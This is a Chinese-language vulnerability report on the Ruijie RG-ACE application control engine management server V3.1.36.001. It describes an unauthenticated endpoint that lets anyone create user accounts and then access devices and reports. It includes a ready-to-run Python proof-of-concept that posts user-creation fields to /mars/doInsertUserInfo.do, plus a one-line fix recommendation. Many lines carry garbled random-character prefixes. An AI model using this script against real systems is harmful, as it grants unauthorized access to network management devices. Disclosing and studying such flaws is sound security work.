锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


# r; p  Q( I  {* h$ S" m  Z2 ]1 p测试的具体版本是
, \1 y( W/ B$ }, k产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730

1 \  N. F) c) Y% Q8 Z8 W( }
7 G+ l6 f* {( m/ U- l. Z# v漏洞证明：



6 `8 j4 W) ^" w& u0 |! V

7 R+ `8 y6 `3 n+ k
执行脚本
* V8 o/ J0 `1 u. w) C' u( Q  T#! /usr/bin/env python
& W% B. G/ L& z4 n1 c; O4 o#coding=gbk
, h9 c6 x- F: b4 p9 t# R#RG-ACE管理服务器 V3.1.36.001
% n& P$ g1 g4 `5 s& E/ e" Fimport urllib2, urllib,cookielib
+ ?1 S2 K3 V! N* lurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
  H0 [2 h+ i* h; v7 l("pwd","aaaaaa"),######密码自己加
% c3 i* B8 o3 O" }4 y1 i1 `  c7 z("trueName","ad"),
("email",""),
("mobilePhone",""),
* ^! d$ ~: u/ A" i("officePhone",""),
("addr",""),
+ h& g' `! U# w+ e* D, G("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
7 k; _; }# g6 u# yprint "Done"

/ Q( o1 I% t3 u. o/ V登录，连接设备
& k, `* Z* p$ }# V; l8 T, u8 R7 |2 `
7 D1 L( i6 k( B9 I



8 t1 D5 c0 _/ I' w6 f" s- G默认的管理员admin权限更大点
8 O5 V) E# O* E- t* [) C' @% K" F7 b




5 m; A0 W5 t9 E% N/ o修复方案：
( Z- n6 _/ O  V7 u: I4 x& i# J5 I2 a加强对接口的权限验证
: Z% @, X, h$ R$ Z6 U1 P5 K